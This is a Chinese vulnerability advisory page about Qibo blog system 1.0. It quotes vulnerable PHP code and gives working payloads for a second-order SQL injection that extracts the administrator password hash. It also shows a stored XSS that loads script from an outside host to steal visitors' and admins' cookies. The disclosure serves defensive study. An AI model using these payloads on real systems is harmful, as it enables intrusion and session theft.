|齐博博客系统高危漏洞集合(SQL+XSS) - VULHUB开源网络安全威胁库

齐博博客系统高危漏洞集合(SQL+XSS)

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述：该博客系统是一个类似博客大巴的公共博客平台两个高危注入+一个可打管理员账号的xss 最新的blog 1.0 http://down.qibosoft.com/down.php?v=blog1.0 ### 详细说明： http://localhost/qibo/bk/blog/member/postlog.php?job=postlog 注册成会员之后发布日志注入一问题代码\blog\member\postlog.php ``` if($job=="postlog") { if($step==2){ if(!$title){ showerr("标题不能为空"); }elseif(!$content){ showerr("内容不能为空"); } if($file_db){ foreach( $file_db AS $key=>$value){ if((eregi("jpg$",$value)||eregi("gif$",$value))&&!eregi("sysimage\/file",$value)){ $picurl=$value; break; } } } if($picurl&&($webdb[if_gdimg])) { $smallpic="$picurl.gif"; $Newpicpath=ROOT_PATH."$webdb[updir]/$smallpic"; gdpic(ROOT_PATH."$webdb[updir]/$picurl",$Newpicpath,200,150); if( file_exists($Newpicpath) ) { $picurl="$smallpic"; } $ispic=1; } $db->query("INSERT INTO `{$pre}blog_log_article` (`title`, `albumid`, `albumname`, `fid`, `fname`, `posttime`, `list`, `uid`, `username`,`picurl`, `ispic`, `yz`, `keywords`, `ishtml`, `ip`,`content`,passwd,viewtype) VALUES ('$title','$albumid','$albumname','$fid','$fname','$timestamp','$timestamp','$lfjuid','$lfjid','$picurl','$ispic','$yz','$keywords','1','$onlineip','$content','$passwd','$viewtype')"); @extract($db->get_one("SELECT * FROM `{$pre}blog_log_article` ORDER BY id DESC LIMIT 1")); refreshto("list.php?type=log&job=list","<a href='../index.php?file=viewlog&uid=$lfjuid&id=$id' target='_blank'>查看效果</a> <a href='list.php?type=log&job=list'>返回列表</a> <a href='?job=$job'>继续发表</a>",600); ``` [<img src="https://images.seebug.org/upload/201502/07131720a4900af5ef6959858098d98fe57b151b.png" alt="fenlei.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/07131720a4900af5ef6959858098d98fe57b151b.png) 其中albumname 入库后出库，导致了sql注入 ``` if($albumid==-1) { if(strlen($newalbum)>30) { showerr("分类名称不能大于30个字符"); } elseif($newalbum=='') { $newalbum="新分类"; } $db->query("INSERT INTO `{$pre}$table_type` ( `name` , `uid` , `list`) VALUES ('$newalbum', '$lfjuid', '$timestamp')"); @extract($db->get_one("SELECT id AS albumid,name AS albumname FROM `{$pre}$table_type` ORDER BY id DESC LIMIT 1")); } elseif($albumid) { @extract($db->get_one("SELECT id AS albumid,name AS albumname FROM `{$pre}$table_type` WHERE id='$albumid' ")); } ``` 但是限制了长度只能小于30位 ``` if(strlen($newalbum)>30) ``` 不过后面的content，passwd无长度限制而且全部可控，所以造成注入利用注释分别在两个输入点注入出管理员密码新建的分类填入a'\ 创建完成之后 content填入所示 [<img src="https://images.seebug.org/upload/201502/07133238796d970f1bd3f445b38509334854a99e.png" alt="_Q6L}OC~A{93K@[W@AWB~@X.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/07133238796d970f1bd3f445b38509334854a99e.png) 其中content默认有两个2换行换行会影响注释符号# 提交 burp拦截我们在burp里面抓包去掉就行 [<img src="https://images.seebug.org/upload/201502/071338516f57ec1f8b0f7f076c5b2deab650d506.png" alt="qudiao.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/071338516f57ec1f8b0f7f076c5b2deab650d506.png) ``` content=*/,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+and+extractvalue(1,+concat(0x5c,(select+password+from+qb_members+limit+0,1))))# ``` [<img src="https://images.seebug.org/upload/201502/0713383180736f8fedba5a5be21f6bb3ccf6f792.png" alt="sucessu.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/0713383180736f8fedba5a5be21f6bb3ccf6f792.png) 同样的注入二在blog\member\postphoto.php ``` if($albumid==-1) { if(strlen($newalbum)>30) { showerr("分类名称不能大于30个字符"); } elseif($newalbum=='') { $newalbum="新分类"; } $db->query("INSERT INTO `{$pre}$table_type` ( `name` , `uid` , `list`) VALUES ('$newalbum', '$lfjuid', '$timestamp')"); @extract($db->get_one("SELECT id AS albumid,name AS albumname FROM `{$pre}$table_type` ORDER BY id DESC LIMIT 1")); } elseif($albumid) { @extract($db->get_one("SELECT id AS albumid,name AS albumname FROM `{$pre}$table_type` WHERE id='$albumid' ")); } } ``` 问题差不多不一一演示了 XSS 发布文章的正文点击选择源码编辑模式就可插入xss 其中只粗略过滤了javascript等关键字但我们知道这远远不够 [<img src="https://images.seebug.org/upload/201502/07134526f4bca912129c9d886ffabdc2b44879f6.png" alt="xss.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/07134526f4bca912129c9d886ffabdc2b44879f6.png) 成功弹窗 [<img src="https://images.seebug.org/upload/201502/071345515627c98ed902ca86d21250df0dec7666.jpg" alt="xssuccess.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/071345515627c98ed902ca86d21250df0dec7666.jpg) 我们插入<script/src=//cro.im/2B></script> 或者<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='http://cro.im/2B';> 均可 [<img src="https://images.seebug.org/upload/201502/0714043737f03bd03f65a1738a1d33030921bd38.jpg" alt="crom1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/0714043737f03bd03f65a1738a1d33030921bd38.jpg) 任意人员（包括管理员）访问可以看到平台hook加载了 [<img src="https://images.seebug.org/upload/201502/0714051421c3686f50d158a20b401cacf6e44087.png" alt="crom2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/0714051421c3686f50d158a20b401cacf6e44087.png) 打到了cookies ### 漏洞证明：新建的分类填入a'/* 创建完成之后 content填入所示 [<img src="https://images.seebug.org/upload/201502/07133238796d970f1bd3f445b38509334854a99e.png" alt="_Q6L}OC~A{93K@[W@AWB~@X.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/07133238796d970f1bd3f445b38509334854a99e.png) 其中content默认有两个2换行换行会影响注释符号# 我们在burp里面抓包去掉就行 [<img src="https://images.seebug.org/upload/201502/071338516f57ec1f8b0f7f076c5b2deab650d506.png" alt="qudiao.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/071338516f57ec1f8b0f7f076c5b2deab650d506.png) ``` content=*/,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+and+extractvalue(1,+concat(0x5c,(select+password+from+qb_members+limit+0,1))))# ``` [<img src="https://images.seebug.org/upload/201502/0713383180736f8fedba5a5be21f6bb3ccf6f792.png" alt="sucessu.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/0713383180736f8fedba5a5be21f6bb3ccf6f792.png) [<img src="https://images.seebug.org/upload/201502/071345515627c98ed902ca86d21250df0dec7666.jpg" alt="xssuccess.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/071345515627c98ed902ca86d21250df0dec7666.jpg) 我们插入<script/src=//cro.im/2B></script> 或者<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='http://cro.im/2B';> 均可 [<img src="https://images.seebug.org/upload/201502/0714043737f03bd03f65a1738a1d33030921bd38.jpg" alt="crom1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/0714043737f03bd03f65a1738a1d33030921bd38.jpg) 任意人员（包括管理员）访问可以看到平台hook加载了 [<img src="https://images.seebug.org/upload/201502/0714051421c3686f50d158a20b401cacf6e44087.png" alt="crom2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/0714051421c3686f50d158a20b401cacf6e44087.png) 打到了cookies

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™